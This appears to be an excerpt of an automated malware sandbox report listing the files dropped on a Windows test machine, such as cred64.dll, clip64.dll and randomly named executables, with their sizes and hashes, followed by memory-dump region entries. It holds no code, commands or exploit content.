e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
109KB

MD5
2afdbe3b99a4736083066a13e4b5d11a

SHA1
4d4856cf02b3123ac16e63d4a448cdbcb1633546

SHA256
8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

SHA512
d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

Filesize
432KB

MD5
9262850e528c0bc616055646585bfdd6

SHA1
580f9def7bde4db88357fa50f465d72e68097910

SHA256
e78daf92482081f96292208b8fba4477988ee0b83b496afac06eacfee957889d

SHA512
f2b1bb03b914e69c958bd56680cc6c07eff3a749203abfa7bdcee068667b1c715bfeb90bd84a2e5cd77f4b544f5f3c4def6424cd9a810f5dba7072dcd03ad3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1233663403-1277323514-675434005-1000\76b53b3ec448f7ccdda2063b15d2bfc3_51f76018-0820-469a-b12d-f27f55f8b028

Filesize
2KB

MD5
06afb12a175e20e271bd7109db85c264

SHA1
be8727e2e5621bd619fc2ee572e34a8f3ff6ffd0

SHA256
0a472d51994de1eff7c08d43f4fc95c98dfc49311d62e853b4b84d46ad5c834d

SHA512
95aa438abc1f45be1e05954cc7bfeac86cf2736b130cc071f0b9ccfffd2c9e6c6101b9d77b388815767e936522c735b2a89c19bc9485d207e1010bce089d408f

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

Filesize
109KB

MD5
726cd06231883a159ec1ce28dd538699

SHA1
404897e6a133d255ad5a9c26ac6414d7134285a2

SHA256
12fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46

SHA512
9ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

Filesize
1.2MB

MD5
15a42d3e4579da615a384c717ab2109b

SHA1
22aeedeb2307b1370cdab70d6a6b6d2c13ad2301

SHA256
3c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103

SHA512
1eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe

Filesize
541KB

MD5
1fc4b9014855e9238a361046cfbf6d66

SHA1
c17f18c8246026c9979ab595392a14fe65cc5e9f

SHA256
f38c27ecbeed9721f0885d3b2f2f767d60a5d1c0a5c98433357f570987da3e50

SHA512
2af234cac24ec4a508693d9affa7f759d4b29bb3c9ddffd9e6350959fd4da26501553399d2b02a8eeae8dace6bfe9b2ce50462ce3c6547497f5b0ea6ed226b12

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe

Filesize
304KB

MD5
cc90e3326d7b20a33f8037b9aab238e4

SHA1
236d173a6ac462d85de4e866439634db3b9eeba3

SHA256
bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

SHA512
b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk

Filesize
2KB

MD5
338eb0f3cfff78d63a434e5ee415bd19

SHA1
198af38f89bac5a05066c607066cbcb22b7a4e2d

SHA256
f0ab1f9162ac284ab00d91ba601f041fa33ac741f039f44b89bac5d5903cf3e1

SHA512
3e6cb6477035215807ffcdfd8c1b444365d195a65cf0ba17207fecadc3c79d90b0a6055bb87505b640a7fd55bfff39e6d36bd01cdc4595d686c0f7b3f128b9d2

Download Submit
C:\Users\Admin\Pictures\4R7gIBIXEBroHn1qUbbRnT57.exe

Filesize
7KB

MD5
5b423612b36cde7f2745455c5dd82577

SHA1
0187c7c80743b44e9e0c193e993294e3b969cc3d

SHA256
e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09

SHA512
c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

Download Submit
C:\Users\Admin\Pictures\94eW9q3fxzD1oOwsSoTX5YVs.exe

Filesize
4.2MB

MD5
6a0b95f57dc02ded8ea15f9b698c24d4

SHA1
4cb9a923123f74804e99d3bd02f98bd04483691a

SHA256
935bfc275fd5ae0cd0f10590da932df25de14d89817438ff0874e81ba2d481db

SHA512
e1e87690245fb834638b0e4866e93e4a4051d047d289ae14060a31c3eba4aa19e7cb161f16efd5162b873bd84a8f7a8ca0c41bc5c218ac96e0ac6de867234f24

Download Submit
C:\Users\Admin\Pictures\ERWhJnjdUBAWd4EVMW8iCIHN.exe

Filesize
461KB

MD5
501058891dd974eb227563587c7ea90c

SHA1
b32f995aec61145b08d6f7b915068100be3b90da

SHA256
9ab29d64df3efa63efa37cb431e9f0b13407917196a196c5ddd445bc572f7ea4

SHA512
4b3df1d2d5d11973e343ffcaf6e94719018eca00e01e637726dee9c3b4c7b680082036dc637d1e7eb168b4e5f1f58cf66a5d20c9c6abe8b165015bce58646b03

Download Submit
C:\Users\Admin\Pictures\ZHlUB29eC3nlTN6shTXVLnct.exe

Filesize
3.2MB

MD5
1221591d54c6d4070b0e04e66d4816f5

SHA1
96eb3cfeb723ae62372434f3a56a4d624ee13853

SHA256
2cf75121e1f108bbf862f8817f5060dd403a62070115e6a4561c6a934fe14d18

SHA512
2be16e62e958febc731842dc56422d4a1e6d01b8adf48c2b13c2f7fe6cecd0bae798a4b489803dc6f032346739d671fe7d6efbf894f44778a55287b9c04aa5d0

Download Submit
C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe

Filesize
5.1MB

MD5
cc4395d0007b9f014fb5e4a00ebeae52

SHA1
a5626295d8f2a22a1c279e95960bddbd7c5346c9

SHA256
e4d6105c07168c59931a1b4ca0b9a446bc7d321c8e2bd8b838c3320da4628df9

SHA512
a6a45571346214c1c8176e38b382b71093de81908715d17b278eb2c7dfdd2cc226e7438fc842e2fc7aa29b32c85aa68b238376f4baf4781096161644c2cc67e8

Download Submit
C:\Users\Admin\Pictures\rLV68tuuMOnkC9xdW6Ch5Ev5.exe

Filesize
7.5MB

MD5
1b5cc71d6e0854316ac014cc1f409c78

SHA1
aa8410fb22c19ec84ecb0b5d3e7cd8d12264da9b

SHA256
601e664ae8e2f2f9d3d74cf4f09314528b6ced11581e32108f49f8e6027fd853

SHA512
acc2b2f2f5853bd13d5737bc7995555300e61a71fda0d1a4a6dd98098a963839357cc6d8dda7ca7eac870ff87da09fb95a8821933de4ad73d1be4256931ccc35

Download Submit
C:\Users\Admin\Pictures\rSqX9vbagkFTnjTAKq14RLlC.exe

Filesize
4.2MB

MD5
938630eeb65c102a6893d6a5c6690cd1

SHA1
49933551b9a5f875bad5b956cb3d2adb8c13fd8f

SHA256
1f7427da5c1491166e751403fedc134da0d7f232b6caa0071582d4b3bac58825

SHA512
da3a865f226c54cde13c78051e5ec1e588c77d296da8020de6f4696665632e7cd2fcd433bd770f16b70bab0cbf83ea9c8207728746e1fa0e52000f28a45b7ea6

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
4638e4d5380391c8012ef3448ccdf1d0

SHA1
1f42302d0ace00e0f06d26b29e72f0e418f60d72

SHA256
d184a7f6075fa5bb566e85f5055302755097965d53b51444bf2fa4def43d7f6a

SHA512
59b5c786a86bf648e4a84a7b8fac9f472513d987edeaae856b611f47f787b89c6e0879826215aa01b19713ef93a12cea9768c08e0336a9cfce2afc4aca25d2bd

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
memory/364-7-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/364-8-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/364-10-0x0000000004FF0000-0x0000000004FF1000-memory.dmp

Filesize
4KB

Download
memory/364-9-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/364-6-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/364-5-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/364-4-0x0000000004FB0000-0x0000000004FB1000-memory.dmp

Filesize
4KB

Download
memory/364-15-0x00000000003D0000-0x000000000088E000-memory.dmp

Filesize
4.7MB

Download
memory/364-0-0x00000000003D0000-0x000000000088E000-memory.dmp

Filesize
4.7MB

Download
memory/364-3-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

Filesize
4KB

Download
memory/364-2-0x00000000003D0000-0x000000000088E000-memory.dmp

Filesize
4.7MB

Download
memory/364-1-0x0000000077726000-0x0000000077728000-memory.dmp

Filesize
8KB

Download
memory/488-180-0x000000001C980000-0x000000001C992000-memory.dmp

Filesize
72KB

Download
memory/488-179-0x000000001DEC0000-0x000000001DFCA000-memory.dmp

Filesize
1.0MB

Download
memory/488-112-0x00007FFD0BC80000-0x00007FFD0C742000-memory.dmp

Filesize
10.8MB

Download
memory/488-111-0x0000000000C60000-0x0000000000CEC000-memory.dmp

Filesize
560KB

Download
memory/488-129-0x000000001BAC0000-0x000000001BAD0000-memory.dmp

Filesize
64KB

Download
memory/488-190-0x000000001DDF0000-0x000000001DE2C000-memory.dmp

Filesize
240KB

Download
memory/864-68-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-22-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/864-355-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-235-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-48-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-26-0x0000000005490000-0x0000000005491000-memory.dmp

Filesize
4KB

Download
memory/864-106-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-25-0x00000000054A0000-0x00000000054A1000-memory.dmp

Filesize
4KB

Download
memory/864-20-0x0000000005450000-0x0000000005451000-memory.dmp

Filesize
4KB

Download
memory/864-19-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-23-0x0000000005420000-0x0000000005421000-memory.dmp

Filesize
4KB

Download
memory/864-18-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/864-24-0x0000000005430000-0x0000000005431000-memory.dmp

Filesize
4KB

Download
memory/864-21-0x0000000005440000-0x0000000005441000-memory.dmp

Filesize
4KB

Download
memory/864-75-0x00000000009C0000-0x0000000000E7E000-memory.dmp

Filesize
4.7MB

Download
memory/2332-458-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/2332-463-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/2956-278-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/3108-155-0x0000000000AA0000-0x0000000000F56000-memory.dmp

Filesize
4.7MB

Download
memory/3108-178-0x0000000000AA0000-0x0000000000F56000-memory.dmp

Filesize
4.7MB

Download
memory/3108-156-0x0000000000AA0000-0x0000000000F56000-memory.dmp

Filesize
4.7MB

Download
memory/3108-159-0x0000000005520000-0x0000000005521000-memory.dmp

Filesize
4KB

Download
memory/3108-165-0x0000000005580000-0x0000000005581000-memory.dmp

Filesize
4KB

Download
memory/3108-164-0x0000000005590000-0x0000000005591000-memory.dmp

Filesize
4KB

Download
memory/3108-163-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/3108-162-0x0000000005510000-0x0000000005511000-memory.dmp

Filesize
4KB

Download
memory/3108-161-0x0000000005500000-0x0000000005501000-memory.dmp

Filesize
4KB

Download
memory/3108-158-0x0000000005540000-0x0000000005541000-memory.dmp

Filesize
4KB

Download
memory/3108-160-0x0000000005570000-0x0000000005571000-memory.dmp

Filesize
4KB

Download
memory/3108-157-0x0000000005530000-0x0000000005531000-memory.dmp

Filesize
4KB

Download
memory/3232-131-0x0000000006280000-0x000000000629E000-memory.dmp

Filesize
120KB

Download
memory/3232-136-0x0000000006450000-0x0000000006462000-memory.dmp

Filesize
72KB

Download
memory/3232-104-0x0000000000440000-0x0000000000492000-memory.dmp

Filesize
328KB

Download
memory/3232-105-0x0000000072E20000-0x00000000735D1000-memory.dmp

Filesize
7.7MB

Download
memory/3232-107-0x00000000054D0000-0x0000000005A76000-memory.dmp

Filesize
5.6MB

Download
memory/3232-108-0x0000000004D20000-0x0000000004DB2000-memory.dmp

Filesize
584KB

Download
memory/3232-110-0x00000000027C0000-0x00000000027CA000-memory.dmp

Filesize
40KB

Download
memory/3232-134-0x00000000069C0000-0x0000000006FD8000-memory.dmp

Filesize
6.1MB

Download
memory/3232-137-0x00000000064B0000-0x00000000064EC000-memory.dmp

Filesize
240KB

Download
memory/3232-128-0x00000000050A0000-0x00000000050B0000-memory.dmp

Filesize
64KB

Download
memory/3232-130-0x0000000005370000-0x00000000053E6000-memory.dmp

Filesize
472KB

Download
memory/3232-138-0x0000000006620000-0x000000000666C000-memory.dmp

Filesize
304KB

Download
memory/3232-135-0x0000000006510000-0x000000000661A000-memory.dmp

Filesize
1.0MB

Download
memory/3456-84-0x0000000072E20000-0x00000000735D1000-memory.dmp

Filesize
7.7MB

Download
memory/3456-74-0x0000000000400000-0x0000000000592000-memory.dmp

Filesize
1.6MB

Download
memory/3456-83-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4312-46-0x0000000000E40000-0x000000000120B000-memory.dmp

Filesize
3.8MB

Download
memory/4312-47-0x0000000000E40000-0x000000000120B000-memory.dmp

Filesize
3.8MB

Download
memory/4312-82-0x0000000000E40000-0x000000000120B000-memory.dmp

Filesize
3.8MB

Download
memory/4312-127-0x0000000000E40000-0x000000000120B000-memory.dmp

Filesize
3.8MB

Download
memory/4312-213-0x0000000000E40000-0x000000000120B000-memory.dmp

Filesize
3.8MB

Download
memory/4312-356-0x0000000000E40000-0x000000000120B000-memory.dmp

Filesize
3.8MB

Download
memory/4732-357-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/5492-467-0x0000000000A30000-0x0000000000EE6000-memory.dmp

Filesize
4.7MB

Download
memory/5492-177-0x0000000000A30000-0x0000000000EE6000-memory.dmp

Filesize
4.7MB

Download
memory/5492-335-0x0000000000A30000-0x0000000000EE6000-memory.dmp

Filesize
4.7MB

Download
memory/5560-429-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-457-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-425-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-466-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-470-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-477-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-418-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-414-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-402-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-400-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-398-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-396-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-395-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-455-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-431-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-462-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-453-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-433-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-448-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-445-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-441-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-439-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-435-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/5560-437-0x0000000005960000-0x0000000005B9C000-memory.dmp

Filesize
2.2MB

Download
memory/6060-80-0x0000000072E20000-0x00000000735D1000-memory.dmp

Filesize
7.7MB

Download
memory/6060-71-0x0000000003480000-0x0000000003490000-memory.dmp

Filesize
64KB

Download
memory/6060-70-0x0000000072E20000-0x00000000735D1000-memory.dmp

Filesize
7.7MB

Download
memory/6060-69-0x0000000000F80000-0x000000000113C000-memory.dmp

Filesize
1.7MB

Download
memory/6060-81-0x00000000035F0000-0x00000000055F0000-memory.dmp

Filesize
32.0MB

Download
memory/6060-199-0x00000000035F0000-0x00000000055F0000-memory.dmp

Filesize
32.0MB

Download